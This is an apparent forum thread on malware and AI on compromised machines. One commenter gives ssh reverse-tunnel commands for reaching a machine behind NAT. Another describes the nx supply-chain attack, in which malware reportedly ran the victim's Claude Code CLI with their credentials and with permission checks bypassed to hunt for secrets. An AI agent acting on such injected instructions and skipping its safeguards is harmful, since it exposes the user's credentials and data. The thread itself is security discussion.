What commonly gets installed in those cases is actual malware: a RAT (Remote Admin Tool) that lets the attacker run commands on your laptop later (kinda like an OpenSSH server, but one that punches a hole out through NAT and phones home to a command server the attacker can use to broadcast commands to their entire fleet of compromised machines).
If the attacker wants AI to help look for valuables on your machine, they won't install AI on your machine; they'll use the remote-shell software to pop a shell session and have an AI running on one of their own machines poke around in that shell for anything sensitive.
If an attacker has access to your unlocked computer, it is already game over, and LLM tooling is quite far down the list of dangerous software they could install.
Maybe we should ban common RAT software first, like `ssh` and `TeamViewer`.
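For what it's worth, plain `ssh` already covers the "punch a hole through NAT" part described above: a reverse tunnel dials out from the target, so no inbound firewall or NAT rule is needed. A minimal sketch (the hostnames and usernames here are made up for illustration):

```
# On the machine inside NAT: dial OUT to a box the operator controls and
# expose the local sshd there as port 2222. No inbound rule is required,
# because the connection originates from the inside.
ssh -N -R 2222:localhost:22 operator@relay.example.com

# On the operator's box: hop back into the NATed machine through that tunnel.
ssh -p 2222 user@localhost
```

About the only thing a purpose-built RAT adds on top is the one-to-many control channel for commanding a whole fleet at once.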
> They won’t install AI on your machine
Actually, they’ll just use the AI you already have on your machine [0].
In this attack, the malware would use Claude Code (with your credentials) to scan your own machine.
Much easier than running the inference themselves!
[0]https://semgrep.dev/blog/2025/security-alert-nx-compromised-...
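To make that concrete: Claude Code's CLI has a non-interactive print mode (`-p`/`--print`) and authenticates with whatever login the local install already has, so a single invocation runs with the victim's own credentials and filesystem access. A deliberately benign sketch of the mechanism (the prompt is mine, not the attack's):

```
# Uses the machine's existing Claude Code login -- no attacker-side API key
# or GPU needed. Per the linked write-up, the nx payload invoked the CLI the
# same way, but with a prompt that hunted for wallets and secrets and with
# permission checks bypassed.
claude -p "List the dotfiles in my home directory and briefly describe what each one configures."
```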
[flagged]
You know, I should have realized this was a troll account with the previous comment.
I guess that's on me for being oblivious enough that it took this obvious of a comment for me to be sure you're intentionally trolling. Nice work.